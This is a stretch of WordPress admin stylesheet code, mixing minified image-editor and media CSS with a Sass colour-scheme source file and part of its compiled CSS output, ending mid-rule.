input{margin-top:0;vertical-align:middle}.imgedit-wait{position:absolute;top:0;bottom:0;width:100%;background:#fff;opacity:.7;display:none}.imgedit-wait:before{content:"";display:block;width:20px;height:20px;position:absolute;right:50%;top:50%;margin:-10px -10px 0 0;background:transparent url(../images/spinner.gif) no-repeat center;background-size:20px 20px;transform:translateZ(0)}.no-float{float:none}.image-editor .disabled,.media-disabled{color:#a7aaad}.A1B1{overflow:hidden}.A1B1 .button,.wp_attachment_image .button{float:right}.no-js .wp_attachment_image .button{display:none}.A1B1 .spinner,.wp_attachment_image .spinner{float:right}.imgedit-menu .note-no-rotate{clear:both;margin:0;padding:1em 0 0}.imgedit-menu .button:after,.imgedit-menu .button:before{font:normal 16px/1 dashicons;margin-left:8px;vertical-align:middle;position:relative;top:-2px;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.imgedit-menu .imgedit-rotate.button:after{content:'\f140';margin-right:2px;margin-left:0}.imgedit-menu .imgedit-rotate.button[aria-expanded=true]:after{content:'\f142'}.imgedit-menu .button.disabled{color:#a7aaad;border-color:#dcdcde;background:#f6f7f7;box-shadow:none;text-shadow:0 1px 0 #fff;cursor:default;transform:none}.imgedit-crop:before{content:"\f165";content:"\f165"/''}.imgedit-scale:before{content:"\f211";content:"\f211"/''}.imgedit-rotate:before{content:"\f167";content:"\f167"/''}.imgedit-undo:before{content:"\f171";content:"\f171"/''}.imgedit-redo:before{content:"\f172";content:"\f172"/''}.imgedit-crop-wrap{position:relative}.imgedit-crop-wrap img{background-image:linear-gradient(-45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7),linear-gradient(-45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7);background-position:100% 0,10px 10px;background-size:20px 20px}.imgedit-crop-wrap{padding:20px;background-image:linear-gradient(-45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7),linear-gradient(-45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7);background-position:100% 0,10px 10px;background-size:20px 20px}.imgedit-crop{margin:0 0 0 8px}.imgedit-rotate{margin:0 3px 0 8px}.imgedit-undo{margin:0 3px}.imgedit-redo{margin:0 3px 0 8px}.imgedit-thumbnail-preview-group{display:flex;flex-wrap:wrap;column-gap:10px}.imgedit-thumbnail-preview{margin:10px 0 0 8px}.imgedit-thumbnail-preview-caption{display:block}#poststuff .imgedit-group-top h2{display:inline-block;margin:0;padding:0;font-size:14px;line-height:1.4}#poststuff .imgedit-group-top .button-link{text-decoration:none;color:#1d2327}.imgedit-applyto .imgedit-label{display:block;padding:.5em 0 0}.imgedit-help,.imgedit-popup-menu{display:none;padding-bottom:8px}.imgedit-panel-tools>.imgedit-menu{display:flex;column-gap:4px;align-items:flex-start;flex-wrap:wrap}.imgedit-popup-menu{width:calc(100% - 20px);position:absolute;background:#fff;padding:10px;box-shadow:0 3px 6px rgba(0,0,0,.3)}.image-editor .imgedit-menu .imgedit-popup-menu button{display:block;margin:2px 0;width:100%;white-space:break-spaces;line-height:1.5;padding-top:3px;padding-bottom:2px}.imgedit-rotate-menu-container{position:relative}.imgedit-help.imgedit-restore{padding-bottom:0}.image-editor .imgedit-settings .imgedit-help-toggle,.image-editor .imgedit-settings .imgedit-help-toggle:active,.image-editor .imgedit-settings .imgedit-help-toggle:hover{border:1px solid transparent;margin:-1px -1px 0 0;padding:0;background:0 0;color:var(--wp-admin-theme-color);font-size:20px;line-height:1;cursor:pointer;box-sizing:content-box;box-shadow:none}.image-editor .imgedit-settings .imgedit-help-toggle:focus{color:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 1px var(--wp-admin-theme-color);outline:2px solid transparent}.form-table td.imgedit-response{padding:0}.imgedit-submit-btn{margin-right:20px}.imgedit-wrap .nowrap{white-space:nowrap;font-size:12px;line-height:inherit}span.imgedit-scale-warn{display:flex;align-items:center;margin:4px;gap:4px;color:#b32d2e;font-style:normal;visibility:hidden;vertical-align:middle}.imgedit-save-target{margin:8px 0}.imgedit-save-target legend{font-weight:600}.imgedit-group{margin-bottom:20px}.image-editor .imgedit-original-dimensions{display:inline-block}.image-editor .imgedit-crop-ratio input[type=number],.image-editor .imgedit-crop-ratio input[type=text],.image-editor .imgedit-crop-sel input[type=number],.image-editor .imgedit-crop-sel input[type=text],.image-editor .imgedit-scale-controls input[type=number],.image-editor .imgedit-scale-controls input[type=text]{width:80px;font-size:14px;padding:0 8px}.imgedit-separator{display:inline-block;width:7px;text-align:center;font-size:13px;color:#3c434a}.image-editor .imgedit-scale-button-wrapper{margin-top:.3077em;display:block}.image-editor .imgedit-scale-controls .button{margin-bottom:0}audio,video{display:inline-block;max-width:100%}.wp-core-ui .mejs-container{width:100%;max-width:100%}.wp-core-ui .mejs-container *{box-sizing:border-box}.wp-core-ui .mejs-time{box-sizing:content-box}@media print,(min-resolution:120dpi){.imgedit-wait:before{background-image:url(../images/spinner-2x.gif)}}@media screen and (max-width:782px){.edit-attachment-frame input,.edit-attachment-frame textarea{line-height:1.5}.wp_attachment_details label[for=content]{font-size:14px;line-height:1.5}.wp_attachment_details textarea{line-height:1.5}.wp_attachment_details #attachment_alt{height:3.375em}.media-upload-form .media-item .error,.media-upload-form .media-item.error{font-size:13px;line-height:1.5}.media-upload-form .media-item.error{padding:1px 10px}.media-upload-form .media-item .error{padding:10px 12px 10px 0}.image-editor .imgedit-crop-ratio input[type=text],.image-editor .imgedit-crop-sel input[type=text],.image-editor .imgedit-scale input[type=text]{font-size:16px;padding:6px 10px}.wp_attachment_holder .imgedit-wrap .image-editor,.wp_attachment_holder .imgedit-wrap .imgedit-panel-content{float:none;width:auto;max-width:none;padding-bottom:16px}.copy-to-clipboard-container .success{font-size:14px}.imgedit-crop-wrap img{width:100%}.media-modal .imgedit-wrap .image-editor,.media-modal .imgedit-wrap .imgedit-panel-content{position:initial!important}.media-modal .imgedit-wrap .image-editor{box-sizing:border-box;width:100%!important}.image-editor .imgedit-scale-button-wrapper{display:inline-block}}@media only screen and (max-width:600px){.media-item-wrapper{grid-template-columns:1fr}}@media only screen and (max-width:1120px){#wp-media-grid .wp-filter .attachment-filters{max-width:100%}}@media only screen and (max-width:1000px){.wp-filter p.search-box{float:none;width:100%;display:flex;flex-wrap:nowrap;column-gap:0}.wp-filter p.search-box #media-search-input{width:100%}}@media only screen and (max-width:782px){.media-frame.mode-select .attachments-browser.fixed .media-toolbar{top:46px;left:10px}.media-frame.mode-grid .media-toolbar select{min-height:40px;padding:0 12px 0 24px}.media-frame.mode-grid .media-toolbar input[type=search]{min-height:40px;padding:0 12px}.wp-filter p.search-box{margin-bottom:0}}@media only screen and (max-width:600px){.media-frame.mode-select .attachments-browser.fixed .media-toolbar{top:0}}@media only screen and (max-width:480px){.edit-attachment-frame .media-frame-title{left:110px}.edit-attachment-frame .edit-media-header .left,.edit-attachment-frame .edit-media-header .right,.upload-php .media-modal-close{width:40px;height:40px}.edit-attachment-frame .edit-media-header .left:before,.edit-attachment-frame .edit-media-header .right:before{line-height:40px!important}.edit-attachment-frame .edit-media-header .left{left:82px}.edit-attachment-frame .edit-media-header .right{left:41px}.edit-attachment-frame .media-frame-content{top:40px}.edit-attachment-frame .attachment-media-view{float:none;height:auto;width:100%}.edit-attachment-frame .attachment-info{height:auto;width:100%}}@media only screen and (max-width:640px),screen and (max-height:400px){.upload-php .mode-grid .media-sidebar{max-width:100%}}@media only screen and (max-width:375px){.media-item .attachment-tools{align-items:baseline}.media-item .edit-attachment.copy-to-clipboard-container{flex-direction:column}.copy-to-clipboard-container .success{line-height:normal;margin-top:10px}}@use 'sass:color'; @use 'sass:string'; @forward 'variables' show $scheme-name, $base-color, $body-background, $button-color, $custom-welcome-panel, $dashboard-accent-1, $dashboard-accent-2, $dashboard-icon-background, $form-checked, $highlight-color, $icon-color, $link, $link-focus, $low-contrast-theme, $menu-bubble-text, $menu-collapse-focus-icon, $menu-collapse-text, $menu-highlight-background, $menu-highlight-icon, $menu-highlight-text, $menu-submenu-text, $menu-submenu-focus-text, $menu-submenu-background, $notification-color, $text-color; @use 'variables'; @use 'mixins'; @use 'tokens'; /** * This function name uses British English to maintain backward compatibility, as developers * may use the function in their own admin CSS files. See #56811. */ @function url-friendly-colour( $color ) { @return '%23' + string.slice( '#{ $color }', 2, -1 ); } body { background: variables.$body-background; } /* Links */ a { color: variables.$link; &:hover, &:active, &:focus { color: variables.$link-focus; } } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-revisions:before, span.wp-media-buttons-icon:before { color: currentColor; } /* Link button - appears as text link, no border or background */ /* Matches Gutenberg's .is-link button variant */ .wp-core-ui .button-link, .wp-core-ui .button.button-link { color: var(--wp-admin-theme-color); &:hover, &:active { color: var(--wp-admin-theme-color-darker-20); } &:focus { color: var(--wp-admin-theme-color); border-radius: tokens.$radius-s; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } &:disabled, &[aria-disabled="true"] { color: tokens.$gray-600; } } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment, .wp-core-ui .button-link-delete { color: tokens.$alert-red; } .media-modal .delete-attachment:hover, .media-modal .trash-attachment:hover, .media-modal .untrash-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:focus, .wp-core-ui .button-link-delete:hover, .wp-core-ui .button-link-delete:focus { color: color.adjust(tokens.$alert-red, $lightness: 10%); } /* Forms */ // Checkbox checked state - uses theme color input[type="checkbox"]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } // Radio checked state - uses theme color input[type="radio"]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } .wp-core-ui input[type="reset"]:hover, .wp-core-ui input[type="reset"]:active { color: variables.$link-focus; } // Text input focus - outset focus ring matching button focus style input[type="text"]:focus, input[type="password"]:focus, input[type="color"]:focus, input[type="date"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="email"]:focus, input[type="month"]:focus, input[type="number"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="time"]:focus, input[type="url"]:focus, input[type="week"]:focus, select:focus, textarea:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } // Checkbox/Radio focus - Gutenberg-style outset focus ring input[type="checkbox"]:focus, input[type="radio"]:focus { border-color: tokens.$gray-900; box-shadow: 0 0 0 2px tokens.$white, 0 0 0 4px var(--wp-admin-theme-color); outline: 2px solid transparent; } // Select focus (wp-core-ui styled selects) .wp-core-ui select:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } // Autocomplete focus state .wp-tags-autocomplete .ui-state-focus, .wp-tags-autocomplete [aria-selected="true"] { background-color: var(--wp-admin-theme-color); } // Password field focus #pass1:focus, #pass1-text:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } // Password toggle button focus .mailserver-pass-wrap .button.wp-hide-pw:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } /* Core UI */ .wp-core-ui { /* Default button - theme color border and text (matches secondary) */ .button { @include mixins.button-secondary(); } /* Secondary button - same as default */ .button-secondary { @include mixins.button-secondary(); } /* Primary button - theme color background */ .button-primary { @include mixins.button(); } .button-group > .button.active { border-color: var(--wp-admin-theme-color); background: rgba(var(--wp-admin-theme-color--rgb), 0.08); } .wp-ui-primary { color: variables.$text-color; background-color: variables.$base-color; } .wp-ui-text-primary { color: variables.$base-color; } .wp-ui-highlight { color: variables.$menu-highlight-text; background-color: variables.$menu-highlight-background; } .wp-ui-text-highlight { color: variables.$menu-highlight-background; } .wp-ui-notification { color: variables.$menu-bubble-text; background-color: variables.$menu-bubble-background; } .wp-ui-text-notification { color: variables.$menu-bubble-background; } .wp-ui-text-icon { color: variables.$menu-icon; } } /* List tables */ // .page-title-action uses secondary button styling .wrap .page-title-action { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: tokens.$radius-s; color: var(--wp-admin-theme-color); } .wrap .page-title-action:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wrap .page-title-action:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wrap .page-title-action:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .view-switch a.current:before { color: variables.$menu-background; } .view-switch a:hover:before { color: variables.$menu-bubble-background; } /* Admin Menu */ #adminmenuback, #adminmenuwrap, #adminmenu { background: variables.$menu-background; } #adminmenu a { color: variables.$menu-text; } #adminmenu div.wp-menu-image:before { color: variables.$menu-icon; } #adminmenu a:hover, #adminmenu li.menu-top:hover, #adminmenu li.opensub > a.menu-top, #adminmenu li > a.menu-top:focus { color: variables.$menu-highlight-text; background-color: variables.$menu-highlight-background; } #adminmenu li.menu-top:hover div.wp-menu-image:before, #adminmenu li.opensub > a.menu-top div.wp-menu-image:before { color: variables.$menu-highlight-icon; } /* Active tabs use a bottom border color that matches the page background color. */ .about-wrap .nav-tab-active, .nav-tab-active, .nav-tab-active:hover { background-color: variables.$body-background; border-bottom-color: variables.$body-background; } /* Admin Menu: submenu */ #adminmenu .wp-submenu, #adminmenu .wp-has-current-submenu .wp-submenu, #adminmenu .wp-has-current-submenu.opensub .wp-submenu, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu { background: variables.$menu-submenu-background; } #adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-right-color: variables.$menu-submenu-background; } #adminmenu .wp-submenu .wp-submenu-head { color: variables.$menu-submenu-text; } #adminmenu .wp-submenu a, #adminmenu .wp-has-current-submenu .wp-submenu a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a { color: variables.$menu-submenu-text; &:focus, &:hover { color: variables.$menu-submenu-focus-text; } } /* Admin Menu: current */ #adminmenu .wp-submenu li.current a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a { color: variables.$menu-submenu-current-text; &:hover, &:focus { color: variables.$menu-submenu-focus-text; } } ul#adminmenu a.wp-has-current-submenu:after, ul#adminmenu > li.current > a.current:after { border-right-color: variables.$body-background; } #adminmenu li.current a.menu-top, #adminmenu li.wp-has-current-submenu a.wp-has-current-submenu, #adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head, .folded #adminmenu li.current.menu-top { color: variables.$menu-current-text; background: variables.$menu-current-background; } #adminmenu li.wp-has-current-submenu div.wp-menu-image:before, #adminmenu a.current:hover div.wp-menu-image:before, #adminmenu li.current div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before, #adminmenu li:hover div.wp-menu-image:before, #adminmenu li a:focus div.wp-menu-image:before, #adminmenu li.opensub div.wp-menu-image:before { color: variables.$menu-current-icon; } /* Admin Menu: bubble */ #adminmenu .menu-counter, #adminmenu .awaiting-mod, #adminmenu .update-plugins { color: variables.$menu-bubble-text; background: variables.$menu-bubble-background; } #adminmenu li.current a .awaiting-mod, #adminmenu li a.wp-has-current-submenu .update-plugins, #adminmenu li:hover a .awaiting-mod, #adminmenu li.menu-top:hover > a .update-plugins { color: variables.$menu-bubble-current-text; background: variables.$menu-bubble-current-background; } /* Admin Menu: collapse button */ #collapse-button { color: variables.$menu-collapse-text; } #collapse-button:hover, #collapse-button:focus { color: variables.$menu-submenu-focus-text; } /* Admin Bar */ #wpadminbar { color: variables.$menu-text; background: variables.$menu-background; } #wpadminbar .ab-item, #wpadminbar a.ab-item, #wpadminbar > #wp-toolbar span.ab-label, #wpadminbar > #wp-toolbar span.noticon { color: variables.$menu-text; } #wpadminbar .ab-icon, #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar .ab-item:after { color: variables.$menu-icon; } #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojq .quicklinks .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojs .ab-top-menu > li.menupop:hover > .ab-item, #wpadminbar .ab-top-menu > li.menupop.hover > .ab-item { color: variables.$menu-submenu-focus-text; background: variables.$menu-submenu-background; } #wpadminbar:not(.mobile) > #wp-toolbar li:hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar li.hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar a:focus span.ab-label { color: variables.$menu-submenu-focus-text; } #wpadminbar:not(.mobile) li:hover .ab-icon:before, #wpadminbar:not(.mobile) li:hover .ab-item:before, #wpadminbar:not(.mobile) li:hover .ab-item:after, #wpadminbar:not(.mobile) li:hover #adminbarsearch:before { color: variables.$menu-submenu-focus-text; } /* Admin Bar: submenu */ #wpadminbar .menupop .ab-sub-wrapper { background: variables.$menu-submenu-background; } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary, #wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu { background: variables.$menu-submenu-background-alt; } #wpadminbar .ab-submenu .ab-item, #wpadminbar .quicklinks .menupop ul li a, #wpadminbar .quicklinks .menupop.hover ul li a, #wpadminbar.nojs .quicklinks .menupop:hover ul li a { color: variables.$menu-submenu-text; } #wpadminbar .quicklinks li .blavatar, #wpadminbar .menupop .menupop > .ab-item:before { color: variables.$menu-icon; } #wpadminbar .quicklinks .menupop ul li a:hover, #wpadminbar .quicklinks .menupop ul li a:focus, #wpadminbar .quicklinks .menupop ul li a:hover strong, #wpadminbar .quicklinks .menupop ul li a:focus strong, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a, #wpadminbar .quicklinks .menupop.hover ul li a:hover, #wpadminbar .quicklinks .menupop.hover ul li a:focus, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus, #wpadminbar li:hover .ab-icon:before, #wpadminbar li:hover .ab-item:before, #wpadminbar li a:focus .ab-icon:before, #wpadminbar li .ab-item:focus:before, #wpadminbar li .ab-item:focus .ab-icon:before, #wpadminbar li.hover .ab-icon:before, #wpadminbar li.hover .ab-item:before, #wpadminbar li:hover #adminbarsearch:before, #wpadminbar li #adminbarsearch.adminbar-focused:before { color: variables.$menu-submenu-focus-text; } #wpadminbar .quicklinks li a:hover .blavatar, #wpadminbar .quicklinks li a:focus .blavatar, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a .blavatar, #wpadminbar .menupop .menupop > .ab-item:hover:before, #wpadminbar.mobile .quicklinks .hover .ab-icon:before, #wpadminbar.mobile .quicklinks .hover .ab-item:before { color: variables.$menu-submenu-focus-text; } #wpadminbar.mobile .quicklinks .ab-icon:before, #wpadminbar.mobile .quicklinks .ab-item:before { color: variables.$menu-icon; } /* Admin Bar: search */ #wpadminbar #adminbarsearch:before { color: variables.$menu-icon; } #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus { color: variables.$menu-text; background: variables.$adminbar-input-background; } /* Admin Bar: recovery mode */ #wpadminbar #wp-admin-bar-recovery-mode { color: variables.$adminbar-recovery-exit-text; background-color: variables.$adminbar-recovery-exit-background; } #wpadminbar #wp-admin-bar-recovery-mode .ab-item, #wpadminbar #wp-admin-bar-recovery-mode a.ab-item { color: variables.$adminbar-recovery-exit-text; } #wpadminbar .ab-top-menu > #wp-admin-bar-recovery-mode.hover >.ab-item, #wpadminbar.nojq .quicklinks .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus { color: variables.$adminbar-recovery-exit-text; background-color: variables.$adminbar-recovery-exit-background-alt; } /* Admin Bar: my account */ #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { border-color: variables.$adminbar-avatar-frame; background-color: variables.$adminbar-avatar-frame; } #wpadminbar #wp-admin-bar-user-info .display-name { color: variables.$menu-text; } #wpadminbar #wp-admin-bar-user-info a:hover .display-name { color: variables.$menu-submenu-focus-text; } #wpadminbar #wp-admin-bar-user-info .username { color: variables.$menu-submenu-text; } /* Pointers */ .wp-pointer .wp-pointer-content h3 { background-color: variables.$highlight-color; border-color: color.adjust(variables.$highlight-color, $lightness: -5%); } .wp-pointer .wp-pointer-content h3:before { color: variables.$highlight-color; } .wp-pointer.wp-pointer-top .wp-pointer-arrow, .wp-pointer.wp-pointer-top .wp-pointer-arrow-inner, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner { border-bottom-color: variables.$highlight-color; } /* Media */ .media-item .bar, .media-progress-bar div { background-color: variables.$highlight-color; } .details.attachment { box-shadow: inset 0 0 0 3px #fff, inset 0 0 0 7px variables.$highlight-color; } .attachment.details .check { background-color: variables.$highlight-color; box-shadow: 0 0 0 1px #fff, 0 0 0 2px variables.$highlight-color; } .media-selection .attachment.selection.details .thumbnail { box-shadow: 0 0 0 1px #fff, 0 0 0 3px variables.$highlight-color; } /* Themes */ .theme-browser .theme.active .theme-name, .theme-browser .theme.add-new-theme a:hover:after, .theme-browser .theme.add-new-theme a:focus:after { background: variables.$highlight-color; } .theme-browser .theme.add-new-theme a:hover span:after, .theme-browser .theme.add-new-theme a:focus span:after { color: variables.$highlight-color; } .theme-section.current, .theme-filter.current { border-bottom-color: variables.$menu-background; } body.more-filters-opened .more-filters { color: variables.$menu-text; background-color: variables.$menu-background; } body.more-filters-opened .more-filters:before { color: variables.$menu-text; } body.more-filters-opened .more-filters:hover, body.more-filters-opened .more-filters:focus { background-color: variables.$menu-highlight-background; color: variables.$menu-highlight-text; } body.more-filters-opened .more-filters:hover:before, body.more-filters-opened .more-filters:focus:before { color: variables.$menu-highlight-text; } /* Widgets */ .widgets-chooser li.widgets-chooser-selected { background-color: variables.$menu-highlight-background; color: variables.$menu-highlight-text; } .widgets-chooser li.widgets-chooser-selected:before, .widgets-chooser li.widgets-chooser-selected:focus:before { color: variables.$menu-highlight-text; } /* Nav Menus */ .nav-menus-php .item-edit:focus:before { box-shadow: 0 0 0 1px color.adjust(variables.$button-color, $lightness: 10%), 0 0 2px 1px variables.$button-color; } /* Responsive Component */ div#wp-responsive-toggle a:before { color: variables.$menu-icon; } .wp-responsive-open div#wp-responsive-toggle a { // ToDo: make inset border border-color: transparent; background: variables.$menu-highlight-background; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a { background: variables.$menu-submenu-background; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { color: variables.$menu-icon; } /* TinyMCE */ .mce-container.mce-menu .mce-menu-item:hover, .mce-container.mce-menu .mce-menu-item.mce-selected, .mce-container.mce-menu .mce-menu-item:focus, .mce-container.mce-menu .mce-menu-item-normal.mce-active, .mce-container.mce-menu .mce-menu-item-preview.mce-active { background: variables.$highlight-color; } /* Customizer */ .wp-core-ui { #customize-controls .control-section:hover > .accordion-section-title, #customize-controls .control-section .accordion-section-title:hover, #customize-controls .control-section.open .accordion-section-title, #customize-controls .control-section .accordion-section-title:focus { color: variables.$link; border-left-color: variables.$button-color; } .customize-controls-close:focus, .customize-controls-close:hover, .customize-controls-preview-toggle:focus, .customize-controls-preview-toggle:hover { color: variables.$link; border-top-color: variables.$button-color; } .customize-panel-back:hover, .customize-panel-back:focus, .customize-section-back:hover, .customize-section-back:focus { color: variables.$link; border-left-color: variables.$button-color; } .customize-screen-options-toggle:hover, .customize-screen-options-toggle:active, .customize-screen-options-toggle:focus, .active-menu-screen-options .customize-screen-options-toggle, #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover, #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active, #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus { color: variables.$link; } .customize-screen-options-toggle:focus:before, #customize-controls .customize-info .customize-help-toggle:focus:before, &.wp-customizer button:focus .toggle-indicator:before, .menu-item-bar .item-delete:focus:before, #available-menu-items .item-add:focus:before, #customize-save-button-wrapper .save:focus, #publish-settings:focus { box-shadow: 0 0 0 1px color.adjust(variables.$button-color, $lightness: 10%), 0 0 2px 1px variables.$button-color; } #customize-controls .customize-info.open .customize-help-toggle, #customize-controls .customize-info .customize-help-toggle:focus, #customize-controls .customize-info .customize-help-toggle:hover { color: variables.$link; } .control-panel-themes .customize-themes-section-title:focus, .control-panel-themes .customize-themes-section-title:hover { border-left-color: variables.$button-color; color: variables.$link; } .control-panel-themes .theme-section .customize-themes-section-title.selected:after { background: variables.$button-color; } .control-panel-themes .customize-themes-section-title.selected { color: variables.$link; } #customize-theme-controls .control-section:hover > .accordion-section-title:after, #customize-theme-controls .control-section .accordion-section-title:hover:after, #customize-theme-controls .control-section.open .accordion-section-title:after, #customize-theme-controls .control-section .accordion-section-title:focus:after, #customize-outer-theme-controls .control-section:hover > .accordion-section-title:after, #customize-outer-theme-controls .control-section .accordion-section-title:hover:after, #customize-outer-theme-controls .control-section.open .accordion-section-title:after, #customize-outer-theme-controls .control-section .accordion-section-title:focus:after { color: variables.$link; } .customize-control .attachment-media-view .button-add-media:focus { background-color: #fbfbfc; border-color: variables.$button-color; border-style: solid; box-shadow: 0 0 0 1px variables.$button-color; outline: 2px solid transparent; } .wp-full-overlay-footer .devices button:focus, .wp-full-overlay-footer .devices button.active:hover { border-bottom-color: variables.$button-color; } .wp-full-overlay-footer .devices button:hover:before, .wp-full-overlay-footer .devices button:focus:before { color: variables.$button-color; } .wp-full-overlay .collapse-sidebar:hover, .wp-full-overlay .collapse-sidebar:focus { color: variables.$button-color; } .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow, .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow { box-shadow: 0 0 0 1px color.adjust(variables.$button-color, $lightness: 10%), 0 0 2px 1px variables.$button-color; } &.wp-customizer .theme-overlay .theme-header .close:focus, &.wp-customizer .theme-overlay .theme-header .close:hover, &.wp-customizer .theme-overlay .theme-header .right:focus, &.wp-customizer .theme-overlay .theme-header .right:hover, &.wp-customizer .theme-overlay .theme-header .left:focus, &.wp-customizer .theme-overlay .theme-header .left:hover { border-bottom-color: variables.$button-color; color: variables.$link; } } /*! This file is auto-generated */ /* * Button mixin - creates a primary button effect. * Uses CSS custom properties for theme color support across color schemes. */ /* * Secondary button mixin - outlined style with theme color. * Matches Gutenberg's .is-secondary button variant. */ /* * Tertiary button mixin - transparent background, gray text. */ /** * This function name uses British English to maintain backward compatibility, as developers * may use the function in their own admin CSS files. See #56811. */ body { background: #f0f0f0; } /* Links */ a { color: #0073aa; } a:hover, a:active, a:focus { color: rgb(0, 149.5, 221); } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-revisions:before, span.wp-media-buttons-icon:before { color: currentColor; } /* Link button - appears as text link, no border or background */ /* Matches Gutenberg's .is-link button variant */ .wp-core-ui .button-link, .wp-core-ui .button.button-link { color: var(--wp-admin-theme-color); } .wp-core-ui .button-link:hover, .wp-core-ui .button-link:active, .wp-core-ui .button.button-link:hover, .wp-core-ui .button.button-link:active { color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-link:focus, .wp-core-ui .button.button-link:focus { color: var(--wp-admin-theme-color); border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-link:disabled, .wp-core-ui .button-link[aria-disabled=true], .wp-core-ui .button.button-link:disabled, .wp-core-ui .button.button-link[aria-disabled=true] { color: #949494; } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment, .wp-core-ui .button-link-delete { color: #cc1818; } .media-modal .delete-attachment:hover, .media-modal .trash-attachment:hover, .media-modal .untrash-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:focus, .wp-core-ui .button-link-delete:hover, .wp-core-ui .button-link-delete:focus { color: rgb(230.6842105263, 48.3157894737, 48.3157894737); } /* Forms */ input[type=checkbox]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } input[type=radio]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } .wp-core-ui input[type=reset]:hover, .wp-core-ui input[type=reset]:active { color: rgb(0, 149.5, 221); } input[type=text]:focus, input[type=password]:focus, input[type=color]:focus, input[type=date]:focus, input[type=datetime]:focus, input[type=datetime-local]:focus, input[type=email]:focus, input[type=month]:focus, input[type=number]:focus, input[type=search]:focus, input[type=tel]:focus, input[type=time]:focus, input[type=url]:focus, input[type=week]:focus, select:focus, textarea:focus { border-color: var(--wp-admin-theme-color); 